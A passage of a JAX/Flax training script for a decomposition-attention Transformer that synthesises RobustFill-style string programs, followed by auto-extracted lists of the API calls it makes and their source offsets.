break return best_p, best_score def shorten(key): splits = key.split('_') return ''.join(s[0] for s in splits) def main(_): tf.enable_v2_behavior() tf.random.set_seed(FLAGS.seed) np.random.seed(FLAGS.seed) random.seed(FLAGS.seed) # BOS special attention only makes sense if we are using relative attention # and it's not the baseline. if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or FLAGS.attention_mask_type == 'baseline'): raise ValueError( "bos_special_attention doesn't work when use_relative_attention={} and " 'attention_mask_type={}'.format(FLAGS.use_relative_attention, FLAGS.attention_mask_type)) if not gfile.isdir(FLAGS.save_dir): gfile.makedirs(FLAGS.save_dir) hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr) # Get hyperparmaters if FLAGS.xm_parameters: for key, value in json.loads(FLAGS.xm_parameters).items(): if key not in hparam_str_dict: hparam_str_dict[key] = value hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k])) for k in sorted(hparam_str_dict.keys())]) # Number of local devices for this host. n_devices = jax.local_device_count() if jax.host_id() == 0: summary_writer = tensorboard.SummaryWriter( os.path.join(FLAGS.save_dir, 'tb', hparam_str)) batch_size = FLAGS.per_device_batch_size * n_devices io_shape = (FLAGS.per_device_batch_size, FLAGS.num_strings_per_task, FLAGS.max_characters) program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length) # Setup DSL # --------------------------------------------------------------------------- # Build token tables. id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)} char_id_table = {char: id for id, char in id_char_table.items()} id_token_table, token_id_table = dsl_tokens.build_token_tables() io_vocab_size = len(char_id_table) + 1 # For padding. program_vocab_size = len(token_id_table) + 1 bos_token = token_id_table[dsl.BOS] eos_token = token_id_table[dsl.EOS] # Parse io and program token sequences (for eval). def decode_io(inputs, outputs): """Decode io examples tokens.""" def decode_str(s): """Decode string tokens.""" return ''.join([id_char_table[c_id] for c_id in s if c_id > 0]) inps, outs = [], [] for inp, out in zip(inputs, outputs): inps.append(decode_str(inp)) outs.append(decode_str(out)) return inps, outs def decode_program(program): """Decode program tokens.""" program = program[:np.argmax(program == eos_token) + 1].astype(np.int32) program = program[program != bos_token] try: return dsl.decode_program(program.tolist(), id_token_table) except: # pylint: disable=bare-except return None # Program does not compile. # Load Dataset # --------------------------------------------------------------------------- logging.info('Initializing dataset.') if not FLAGS.dataset_filepattern: raise ValueError('Must specify filepattern to dataset.') # Training dataset. logging.info('Loading dataset from %s', FLAGS.dataset_filepattern) padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:]) logging.info('padded_shapes: %s', padded_shapes) dataset = input_pipeline.create_dataset_from_tf_record( FLAGS.dataset_filepattern, token_id_table, char_id_table) dataset = dataset.padded_batch( batch_size, padded_shapes=padded_shapes, drop_remainder=True) # Split evaluation and training. eval_ds = dataset.take(FLAGS.num_eval_steps) # Decrease batch of predict dataset to handle beam search. 
predict_ds = eval_ds.unbatch().padded_batch( int(np.ceil(batch_size / 10)), padded_shapes=padded_shapes) train_ds = dataset.skip(FLAGS.num_eval_steps).repeat() train_iter = train_ds.as_numpy_iterator() # Build Model and Optimizer # --------------------------------------------------------------------------- use_dropout = False base_config = base_models.TransformerConfig( vocab_size=io_vocab_size, output_vocab_size=program_vocab_size, shift=True, emb_dim=FLAGS.embedding_dim, num_heads=FLAGS.num_heads, num_layers=FLAGS.num_layers, qkv_dim=FLAGS.embedding_dim, mlp_dim=FLAGS.hidden_dim, max_len=max(FLAGS.max_characters, FLAGS.max_program_length), use_relative_attention=FLAGS.use_relative_attention, deterministic=not use_dropout, decode=False, bos_token=bos_token) train_config = models.DecomposeAttentionTransformerConfig( base_config=base_config, attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) eval_config = models.DecomposeAttentionTransformerConfig( base_config=base_config.replace(deterministic=not use_dropout), attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) predict_config = models.DecomposeAttentionTransformerConfig( base_config=base_config.replace( shift=False, deterministic=not use_dropout, decode=not FLAGS.slow_decode), attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) rng = jax.random.PRNGKey(FLAGS.seed) rng = jax.random.fold_in(rng, jax.host_id()) rng, init_rng = jax.random.split(rng) m = models.DecomposeAttentionTransformer(eval_config) initial_variables = jax.jit(m.init)( {'params': init_rng, 'dropout': init_rng}, jnp.ones(io_shape, jnp.float32), jnp.ones(io_shape, jnp.float32), jnp.ones(program_shape, jnp.float32)) optimizer_def = optim.Adam( FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-9, weight_decay=FLAGS.weight_decay) optimizer = optimizer_def.create(initial_variables['params']) del initial_variables # Don't keep a copy of the initial model. start_step = 0 if FLAGS.restore_checkpoints: # Restore unreplicated optimizer + model state from last checkpoint. optimizer = checkpoints.restore_checkpoint( os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer) # Grab last step. start_step = int(optimizer.state.step) logging.info('Found model checkpointed at step %d.', start_step) if FLAGS.finetune_start_step > 0: logging.info('Checking that start_step (%s) == finetune_start_step (%s)', start_step, FLAGS.finetune_start_step) assert start_step == FLAGS.finetune_start_step # Replicate optimizer. optimizer = jax_utils.replicate(optimizer) # TODO(jxihong): Implement fast decoding. assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.' if FLAGS.finetune_start_step <= 0: learning_rate_fn = create_learning_rate_scheduler( base_learning_rate=FLAGS.lr) else: # Constant LR for finetuning. 
learning_rate_fn = create_learning_rate_scheduler( base_learning_rate=FLAGS.lr, factors='constant') p_train_step = jax.pmap( functools.partial( train_step, learning_rate_fn=learning_rate_fn, config=train_config), axis_name='batch') p_eval_step = jax.pmap( functools.partial(eval_step, eos_token=eos_token, config=eval_config), axis_name='batch') p_init_cache = jax.pmap( functools.partial( initialize_cache, max_decode_len=FLAGS.max_program_length, config=predict_config), axis_name='batch') p_pred_step = jax.pmap( functools.partial( predict_step, eos_token=eos_token, max_decode_len=FLAGS.max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode), axis_name='batch', static_broadcasted_argnums=(4,)) # Main Train Loop # --------------------------------------------------------------------------- dropout_rng = jax.random.split(rng, jax.local_device_count()) del rng metrics_all = [] tick = time.time() for step in range(start_step, FLAGS.num_train_steps): inputs, outputs, programs = common_utils.shard(next(train_iter)) optimizer, metrics, dropout_rng = p_train_step( optimizer, inputs, outputs, programs, dropout_rng=dropout_rng) metrics_all.append(metrics) is_last_step = step == FLAGS.num_train_steps - 1 # Save a Checkpoint if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step: if jax.host_id() == 0: # Save unreplicated optimizer + model state. checkpoints.save_checkpoint( os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), jax_utils.unreplicate(optimizer), step) # Periodic metric handling. # Training Metrics if (step and step % FLAGS.log_freq == 0) or is_last_step: logging.info('Gathering training metrics.') metrics_all = common_utils.get_metrics(metrics_all) lr = metrics_all.pop('learning_rate').mean() metrics_sums = jax.tree_map(jnp.sum, metrics_all) denominator = metrics_sums.pop('denominator') summary = jax.tree_map( lambda x: x / denominator, # pylint: disable=cell-var-from-loop metrics_sums) summary['learning_rate'] = lr # Calculate (clipped) perplexity after averaging log-perplexities: summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4) if jax.host_id() == 0: logging.info('Train in step: %d, loss: %.4f', step, summary['loss']) tock = time.time() steps_per_sec = FLAGS.log_freq / (tock - tick) tick = tock summary_writer.scalar('train/steps per second', steps_per_sec, step) for key, val in summary.items(): summary_writer.scalar('train/' + key, val, step) summary_writer.flush() # Reset metric accumulation for next evaluation cycle. metrics_all = [] # Evaluation Metrics if (step and step % FLAGS.eval_freq == 0) or is_last_step: logging.info('Gathering evaluation metrics.') t_evaluation_start = time.time() eval_metrics = [] for batches in eval_ds.as_numpy_iterator(): inputs, outputs, programs = common_utils.shard(batches) metrics = p_eval_step(optimizer.target, inputs, outputs, programs) eval_metrics.append(metrics) eval_metrics = common_utils.get_metrics(eval_metrics) eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics) eval_denominator = eval_metrics_sums.pop('denominator') eval_summary = jax.tree_map( lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop eval_metrics_sums) if jax.host_id() == 0: logging.info('Evaluation time: %.4f s step %d, loss: %.4f.', time.time()-t_evaluation_start, step, eval_summary['loss']) for key, val in eval_summary.items(): summary_writer.scalar('eval/' + key, val, step) summary_writer.flush() # Beam search metrics. 
if (step and step % FLAGS.predict_freq == 0) or is_last_step: logging.info('Gathering beam search metrics.') for beam_size in [1, 5, 10, 20, 50]: t_inference_start = time.time() pred_acc = 0 pred_denominator = 0 ios, targets, predictions, top_of_beams = [], [], [], [] for batches in predict_ds.as_numpy_iterator(): pred_batch = batches # Handle final odd-sized batch by padding instead of dropping it. cur_pred_batch_size = pred_batch[0].shape[0] if cur_pred_batch_size % n_devices: padded_size = int( np.ceil(cur_pred_batch_size / n_devices) * n_devices) # pylint: disable=cell-var-from-loop pred_batch = jax.tree_map( lambda x: pad_examples(x, padded_size), pred_batch) inputs, outputs, programs = common_utils.shard(pred_batch) cache = (p_init_cache(inputs, outputs, programs) if not FLAGS.slow_decode else None) predicted = p_pred_step(optimizer.target, inputs, outputs, cache, beam_size) predicted = tohost(predicted) inputs, outputs, programs = map(tohost, (inputs, outputs, programs)) pred_denominator += programs.shape[0] for i, beams in enumerate(predicted): inps, outs = decode_io(inputs[i], outputs[i]) p, p_score = eval_predicted( beams, inps, outs, parse_beam_fn=decode_program) if p_score >= len(inps): pred_acc += 1 ios.append(' ; '.join(map(str, zip(inps, outs)))) targets.append(decode_program(programs[i]).to_string()) try: predictions.append(p.to_string()) except: # pylint: disable=bare-except predictions.append('Did not compile') logging.info('ios: %s', ios[-1]) logging.info('target: %s', targets[-1]) beams_log = [] for beam in beams: try: beams_log.append(decode_program(beam).to_string()) except: # pylint: disable=bare-except beams_log.append('Did not compile') logging.info('predicted beam: %s', '\n'.join(beams_log)) top_of_beam = [] for index, beam in enumerate(beams[:-5:-1]): try: decoded_program = decode_program(beam).to_string() except: # pylint: disable=bare-except decoded_program = 'Did not compile' top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format( index, decoded_program, beam)) top_of_beams.append('\n\n'.join(top_of_beam)) all_pred_acc, all_pred_denominator = per_host_sum_pmap( jax.tree_map(np.array, (pred_acc, pred_denominator))) # Record beam search results as text summaries. message = [] for n in np.random.choice(np.arange(len(predictions)), 8): text = (f'ios: {ios[n]}\n\ntarget: {targets[n]}\n\n' f'predicted: {predictions[n]}\n\n' f'top of beam:\n\n{top_of_beams[n]}\n\n') message.append(text) # Write to tensorboard. if jax.host_id() == 0: slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast' logging.info( 'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f', slow_or_fast, beam_size, time.time() - t_inference_start, step, all_pred_acc / all_pred_denominator) summary_writer.scalar( 'predict-{}/score-{}'.format(slow_or_fast, beam_size), all_pred_acc / all_pred_denominator, step) summary_writer.text('samples-{}'.format(beam_size), '\n------\n'.join(message), step) summary_writer.flush() if __name__ == '__main__': app.run(main)
[ "flax.training.common_utils.shard", "flax.optim.Adam", "tensorflow.compat.v2.random.set_seed", "latent_programmer.tasks.robust_fill.tokens.build_token_tables", "absl.logging.info", "jax.tree_map", "latent_programmer.decode.beam_search", "flax.training.common_utils.onehot", "jax.jit", "sys.path.append", "absl.flags.DEFINE_float", "jax.random.split", "jax.random.PRNGKey", "absl.flags.DEFINE_boolean", "absl.app.run", "jax.numpy.asarray", "flax.jax_utils.replicate", "flax.jax_utils.unreplicate", "numpy.random.seed", "jax.value_and_grad", "numpy.tile", "numpy.ceil", "json.loads", "jax.lax.psum", "jax.numpy.where", "jax.numpy.cos", "jax.local_device_count", "jax.devices", "jax.numpy.broadcast_to", "latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer", "numpy.argmax", "jax.lax.pmean", "jax.numpy.ones", "flax.training.common_utils.get_metrics", "absl.flags.DEFINE_string", "time.time", "jax.host_id", "tensorflow.compat.v2.enable_v2_behavior", "latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record", "latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig", "jax.numpy.minimum", "jax.numpy.logical_and", "absl.flags.DEFINE_bool", "absl.flags.DEFINE_integer", "jax.numpy.sqrt", "os.path.join", "jax.numpy.exp", "random.seed", "jax.numpy.maximum", "collections.defaultdict", "latent_programmer.decode.flat_batch_beam_expand", "functools.partial", "flax.linen.log_softmax", "jax.numpy.argmax" ]
[((1590, 1615), 'sys.path.append', 'sys.path.append', (['"""../../"""'], {}), "('../../')\n", (1605, 1615), False, 'import sys\n'), ((1658, 1724), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""seed"""', '(0)', '"""Fixed random seed for training."""'], {}), "('seed', 0, 'Fixed random seed for training.')\n", (1678, 1724), False, 'from absl import flags\n'), ((1725, 1774), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""lr"""', '(0.001)', '"""Learning rate."""'], {}), "('lr', 0.001, 'Learning rate.')\n", (1743, 1774), False, 'from absl import flags\n'), ((1774, 1863), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['"""weight_decay"""', '(0.1)', '"""Decay factor for AdamW-style weight decay."""'], {}), "('weight_decay', 0.1,\n 'Decay factor for AdamW-style weight decay.')\n", (1792, 1863), False, 'from absl import flags\n'), ((1880, 1946), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""embedding_dim"""', '(256)', '"""Embedding dimension."""'], {}), "('embedding_dim', 256, 'Embedding dimension.')\n", (1900, 1946), False, 'from absl import flags\n'), ((1947, 2007), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""hidden_dim"""', '(512)', '"""Hidden dimension."""'], {}), "('hidden_dim', 512, 'Hidden dimension.')\n", (1967, 2007), False, 'from absl import flags\n'), ((2008, 2065), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_heads"""', '(4)', '"""Number of layers."""'], {}), "('num_heads', 4, 'Number of layers.')\n", (2028, 2065), False, 'from absl import flags\n'), ((2066, 2135), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_layers"""', '(3)', '"""Number of Transformer heads."""'], {}), "('num_layers', 3, 'Number of Transformer heads.')\n", (2086, 2135), False, 'from absl import flags\n'), ((2136, 2214), 'absl.flags.DEFINE_boolean', 'flags.DEFINE_boolean', (['"""slow_decode"""', '(True)', '"""Use slow decoding for prediction?"""'], {}), "('slow_decode', True, 'Use slow decoding for prediction?')\n", (2156, 2214), False, 'from absl import flags\n'), ((2216, 2305), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""dataset_filepattern"""', 'None', '"""Filepattern for TFRecord dataset."""'], {}), "('dataset_filepattern', None,\n 'Filepattern for TFRecord dataset.')\n", (2235, 2305), False, 'from absl import flags\n'), ((2322, 2414), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""per_device_batch_size"""', '(16)', '"""Number of program tasks in a batch."""'], {}), "('per_device_batch_size', 16,\n 'Number of program tasks in a batch.')\n", (2342, 2414), False, 'from absl import flags\n'), ((2432, 2527), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_strings_per_task"""', '(4)', '"""Number of input/output strings per task."""'], {}), "('num_strings_per_task', 4,\n 'Number of input/output strings per task.')\n", (2452, 2527), False, 'from absl import flags\n'), ((2545, 2636), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_program_length"""', '(100)', '"""Maximum number of tokens in program."""'], {}), "('max_program_length', 100,\n 'Maximum number of tokens in program.')\n", (2565, 2636), False, 'from absl import flags\n'), ((2654, 2758), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""max_characters"""', '(120)', '"""Maximum number of characters in input/output strings."""'], {}), "('max_characters', 120,\n 'Maximum number of characters in input/output strings.')\n", (2674, 2758), False, 'from absl import flags\n'), ((2777, 2847), 'absl.flags.DEFINE_string', 
'flags.DEFINE_string', (['"""save_dir"""', 'None', '"""Directory to save results to."""'], {}), "('save_dir', None, 'Directory to save results to.')\n", (2796, 2847), False, 'from absl import flags\n'), ((2848, 2925), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_train_steps"""', '(2000000)', '"""Number of training steps."""'], {}), "('num_train_steps', 2000000, 'Number of training steps.')\n", (2868, 2925), False, 'from absl import flags\n'), ((2926, 2999), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""num_eval_steps"""', '(10)', '"""Number of evaluation steps."""'], {}), "('num_eval_steps', 10, 'Number of evaluation steps.')\n", (2946, 2999), False, 'from absl import flags\n'), ((3000, 3085), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""log_freq"""', '(1000)', '"""Number of steps between training logs."""'], {}), "('log_freq', 1000, 'Number of steps between training logs.'\n )\n", (3020, 3085), False, 'from absl import flags\n'), ((3081, 3153), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""eval_freq"""', '(2000)', '"""Number of steps between eval."""'], {}), "('eval_freq', 2000, 'Number of steps between eval.')\n", (3101, 3153), False, 'from absl import flags\n'), ((3154, 3254), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""predict_freq"""', '(50000)', '"""Number of steps between prediction (beam search)."""'], {}), "('predict_freq', 50000,\n 'Number of steps between prediction (beam search).')\n", (3174, 3254), False, 'from absl import flags\n'), ((3272, 3367), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""checkpoint_freq"""', '(50000)', '"""Number of steps between checkpoint saves."""'], {}), "('checkpoint_freq', 50000,\n 'Number of steps between checkpoint saves.')\n", (3292, 3367), False, 'from absl import flags\n'), ((3385, 3529), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['"""finetune_start_step"""', '(-1)', '"""Step the initial checkpoint should start at for finetuning, or -1 if not finetuning."""'], {}), "('finetune_start_step', -1,\n 'Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.'\n )\n", (3405, 3529), False, 'from absl import flags\n'), ((3566, 3671), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""restore_checkpoints"""', '(True)', '"""Whether to restore from existing model checkpoints."""'], {}), "('restore_checkpoints', True,\n 'Whether to restore from existing model checkpoints.')\n", (3583, 3671), False, 'from absl import flags\n'), ((3687, 3852), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""attention_mask_type"""', '"""bos_full_attention"""', '"""The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention"""'], {}), "('attention_mask_type', 'bos_full_attention',\n 'The kind of attention mask to use. 
Options are: baseline, bos_to_bos, bos_full_attention'\n )\n", (3706, 3852), False, 'from absl import flags\n'), ((3888, 3990), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""use_relative_attention"""', '(True)', '"""Whether to use relative positonal embeddings."""'], {}), "('use_relative_attention', True,\n 'Whether to use relative positonal embeddings.')\n", (3905, 3990), False, 'from absl import flags\n'), ((4005, 4131), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['"""bos_special_attention"""', '(False)', '"""Whether to use special relative attention computation for BOS tokens."""'], {}), "('bos_special_attention', False,\n 'Whether to use special relative attention computation for BOS tokens.')\n", (4022, 4131), False, 'from absl import flags\n'), ((4207, 4296), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""xm_parameters"""', 'None', '"""String specifying hyperparamter search."""'], {}), "('xm_parameters', None,\n 'String specifying hyperparamter search.')\n", (4226, 4296), False, 'from absl import flags\n'), ((7127, 7173), 'flax.training.common_utils.onehot', 'common_utils.onehot', (['targets', 'logits.shape[-1]'], {}), '(targets, logits.shape[-1])\n', (7146, 7173), False, 'from flax.training import common_utils\n'), ((8564, 8594), 'jax.lax.psum', 'jax.lax.psum', (['metrics', '"""batch"""'], {}), "(metrics, 'batch')\n", (8576, 8594), False, 'import jax\n'), ((9159, 9188), 'jax.random.split', 'jax.random.split', (['dropout_rng'], {}), '(dropout_rng)\n', (9175, 9188), False, 'import jax\n'), ((9719, 9760), 'jax.value_and_grad', 'jax.value_and_grad', (['loss_fn'], {'has_aux': '(True)'}), '(loss_fn, has_aux=True)\n', (9737, 9760), False, 'import jax\n'), ((9818, 9846), 'jax.lax.pmean', 'jax.lax.pmean', (['grad', '"""batch"""'], {}), "(grad, 'batch')\n", (9831, 9846), False, 'import jax\n'), ((12015, 12077), 'latent_programmer.decode.flat_batch_beam_expand', 'decode.flat_batch_beam_expand', (['encoded_padding_mask', 'beam_size'], {}), '(encoded_padding_mask, beam_size)\n', (12044, 12077), False, 'from latent_programmer import decode\n'), ((13395, 13607), 'latent_programmer.decode.beam_search', 'decode.beam_search', (['inputs', 'cache', 'tokens_ids_to_logits'], {'beam_size': 'beam_size', 'alpha': '(0.6)', 'bos_token': 'config.base_config.bos_token', 'eos_token': 'eos_token', 'max_decode_len': 'max_decode_len', 'slow_decode': 'slow_decode'}), '(inputs, cache, tokens_ids_to_logits, beam_size=beam_size,\n alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token,\n max_decode_len=max_decode_len, slow_decode=slow_decode)\n', (13413, 13607), False, 'from latent_programmer import decode\n'), ((14514, 14543), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (14537, 14543), False, 'import collections\n'), ((14555, 14568), 'jax.devices', 'jax.devices', ([], {}), '()\n', (14566, 14568), False, 'import jax\n'), ((15633, 15656), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (15654, 15656), True, 'import tensorflow.compat.v2 as tf\n'), ((15660, 15690), 'tensorflow.compat.v2.random.set_seed', 'tf.random.set_seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15678, 15690), True, 'import tensorflow.compat.v2 as tf\n'), ((15693, 15719), 'numpy.random.seed', 'np.random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15707, 15719), True, 'import numpy as np\n'), ((15722, 15745), 'random.seed', 'random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (15733, 15745), False, 'import random\n'), ((16766, 16790), 
'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (16788, 16790), False, 'import jax\n'), ((17466, 17497), 'latent_programmer.tasks.robust_fill.tokens.build_token_tables', 'dsl_tokens.build_token_tables', ([], {}), '()\n', (17495, 17497), True, 'from latent_programmer.tasks.robust_fill import tokens as dsl_tokens\n'), ((18542, 18579), 'absl.logging.info', 'logging.info', (['"""Initializing dataset."""'], {}), "('Initializing dataset.')\n", (18554, 18579), False, 'from absl import logging\n'), ((18702, 18768), 'absl.logging.info', 'logging.info', (['"""Loading dataset from %s"""', 'FLAGS.dataset_filepattern'], {}), "('Loading dataset from %s', FLAGS.dataset_filepattern)\n", (18714, 18768), False, 'from absl import logging\n'), ((18837, 18885), 'absl.logging.info', 'logging.info', (['"""padded_shapes: %s"""', 'padded_shapes'], {}), "('padded_shapes: %s', padded_shapes)\n", (18849, 18885), False, 'from absl import logging\n'), ((18898, 19004), 'latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record', 'input_pipeline.create_dataset_from_tf_record', (['FLAGS.dataset_filepattern', 'token_id_table', 'char_id_table'], {}), '(FLAGS.dataset_filepattern,\n token_id_table, char_id_table)\n', (18942, 19004), False, 'from latent_programmer.decomposition_transformer_attention import input_pipeline\n'), ((20156, 20330), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig', 'models.DecomposeAttentionTransformerConfig', ([], {'base_config': 'base_config', 'attention_mask_type': 'FLAGS.attention_mask_type', 'bos_special_attention': 'FLAGS.bos_special_attention'}), '(base_config=base_config,\n attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=\n FLAGS.bos_special_attention)\n', (20198, 20330), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((20897, 20927), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['FLAGS.seed'], {}), '(FLAGS.seed)\n', (20915, 20927), False, 'import jax\n'), ((20993, 21014), 'jax.random.split', 'jax.random.split', (['rng'], {}), '(rng)\n', (21009, 21014), False, 'import jax\n'), ((21022, 21071), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['eval_config'], {}), '(eval_config)\n', (21058, 21071), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((21301, 21393), 'flax.optim.Adam', 'optim.Adam', (['FLAGS.lr'], {'beta1': '(0.9)', 'beta2': '(0.98)', 'eps': '(1e-09)', 'weight_decay': 'FLAGS.weight_decay'}), '(FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-09, weight_decay=FLAGS.\n weight_decay)\n', (21311, 21393), False, 'from flax import optim\n'), ((22201, 22231), 'flax.jax_utils.replicate', 'jax_utils.replicate', (['optimizer'], {}), '(optimizer)\n', (22220, 22231), False, 'from flax import jax_utils\n'), ((23679, 23690), 'time.time', 'time.time', ([], {}), '()\n', (23688, 23690), False, 'import time\n'), ((30635, 30648), 'absl.app.run', 'app.run', (['main'], {}), '(main)\n', (30642, 30648), False, 'from absl import app\n'), ((6479, 6514), 'jax.numpy.asarray', 'jnp.asarray', (['ret'], {'dtype': 'jnp.float32'}), '(ret, dtype=jnp.float32)\n', (6490, 6514), True, 'import jax.numpy as jnp\n'), ((7274, 7300), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (7285, 7300), True, 'import jax.numpy as jnp\n'), 
((8008, 8035), 'jax.numpy.argmax', 'jnp.argmax', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\n', (8018, 8035), True, 'import jax.numpy as jnp\n'), ((8078, 8104), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\n', (8089, 8104), True, 'import jax.numpy as jnp\n'), ((10914, 10935), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (10932, 10935), False, 'import jax\n'), ((10943, 10972), 'jax.numpy.ones', 'jnp.ones', (['inputs.shape', 'dtype'], {}), '(inputs.shape, dtype)\n', (10951, 10972), True, 'import jax.numpy as jnp\n'), ((10980, 11010), 'jax.numpy.ones', 'jnp.ones', (['outputs.shape', 'dtype'], {}), '(outputs.shape, dtype)\n', (10988, 11010), True, 'import jax.numpy as jnp\n'), ((11018, 11047), 'jax.numpy.ones', 'jnp.ones', (['target_shape', 'dtype'], {}), '(target_shape, dtype)\n', (11026, 11047), True, 'import jax.numpy as jnp\n'), ((14867, 14899), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x[0])', 'xs'], {}), '(lambda x: x[0], xs)\n', (14879, 14899), False, 'import jax\n'), ((16797, 16810), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (16808, 16810), False, 'import jax\n'), ((20960, 20973), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (20971, 20973), False, 'import jax\n'), ((21094, 21109), 'jax.jit', 'jax.jit', (['m.init'], {}), '(m.init)\n', (21101, 21109), False, 'import jax\n'), ((21166, 21197), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21174, 21197), True, 'import jax.numpy as jnp\n'), ((21205, 21236), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\n', (21213, 21236), True, 'import jax.numpy as jnp\n'), ((21244, 21280), 'jax.numpy.ones', 'jnp.ones', (['program_shape', 'jnp.float32'], {}), '(program_shape, jnp.float32)\n', (21252, 21280), True, 'import jax.numpy as jnp\n'), ((21867, 21931), 'absl.logging.info', 'logging.info', (['"""Found model checkpointed at step %d."""', 'start_step'], {}), "('Found model checkpointed at step %d.', start_step)\n", (21879, 21931), False, 'from absl import logging\n'), ((22670, 22760), 'functools.partial', 'functools.partial', (['train_step'], {'learning_rate_fn': 'learning_rate_fn', 'config': 'train_config'}), '(train_step, learning_rate_fn=learning_rate_fn, config=\n train_config)\n', (22687, 22760), False, 'import functools\n'), ((22845, 22914), 'functools.partial', 'functools.partial', (['eval_step'], {'eos_token': 'eos_token', 'config': 'eval_config'}), '(eval_step, eos_token=eos_token, config=eval_config)\n', (22862, 22914), False, 'import functools\n'), ((23022, 23125), 'functools.partial', 'functools.partial', (['initialize_cache'], {'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config'}), '(initialize_cache, max_decode_len=FLAGS.max_program_length,\n config=predict_config)\n', (23039, 23125), False, 'import functools\n'), ((23211, 23363), 'functools.partial', 'functools.partial', (['predict_step'], {'eos_token': 'eos_token', 'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config', 'slow_decode': 'FLAGS.slow_decode'}), '(predict_step, eos_token=eos_token, max_decode_len=FLAGS.\n max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode)\n', (23228, 23363), False, 'import functools\n'), ((23614, 23638), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\n', (23636, 23638), False, 'import jax\n'), ((9202, 9231), 'jax.numpy.where', 'jnp.where', (['(programs > 0)', '(1)', '(0)'], {}), '(programs > 0, 1, 0)\n', (9211, 
